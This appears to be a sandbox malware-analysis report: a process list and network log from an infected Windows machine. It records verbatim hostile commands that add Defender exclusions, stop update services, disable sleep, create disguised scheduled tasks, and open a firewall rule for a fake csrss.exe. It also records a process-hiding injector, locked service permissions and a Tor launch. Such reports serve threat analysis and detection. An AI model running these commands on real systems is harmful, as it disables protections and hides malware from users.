"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8yo518RN.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8yo518RN.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9mE4sQ5.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9mE4sQ5.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7356 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7356 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\143.exe
C:\Users\Admin\AppData\Local\Temp\143.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2A67.exe
C:\Users\Admin\AppData\Local\Temp\2A67.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\forc.exe
"C:\Users\Admin\AppData\Local\Temp\forc.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\8F5D.exe
C:\Users\Admin\AppData\Local\Temp\8F5D.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\E8E8.exe
C:\Users\Admin\AppData\Local\Temp\E8E8.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Users\Admin\AppData\Local\Temp\EE58.exe
C:\Users\Admin\AppData\Local\Temp\EE58.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\EFC0.exe
C:\Users\Admin\AppData\Local\Temp\EFC0.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\NextSink\hsgqmy\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\hsgqmy\TypeId.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 157.240.5.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 3.224.228.139:443 | www.epicgames.com | tcp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 104.244.42.129:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| JP | 23.207.106.113:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 35.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.228.224.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.106.207.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.214.58.216.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 113.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 93.184.220.70:443 | pbs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| NL | 199.232.148.158:443 | video.twimg.com | tcp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.220.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.148.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.42.244.104.in-addr.arpa | udp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | tracking.epicgames.com | udp |
| US | 8.8.8.8:53 | static-assets-prod.unrealengine.com | udp |
| US | 44.214.245.214:443 | tracking.epicgames.com | tcp |
| US | 18.239.36.105:443 | static-assets-prod.unrealengine.com | tcp |
| US | 18.239.36.105:443 | static-assets-prod.unrealengine.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 105.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.245.214.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 157.240.5.10:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | community.akamai.steamstatic.com | udp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.72.252.163:80 | apps.identrust.com | tcp |
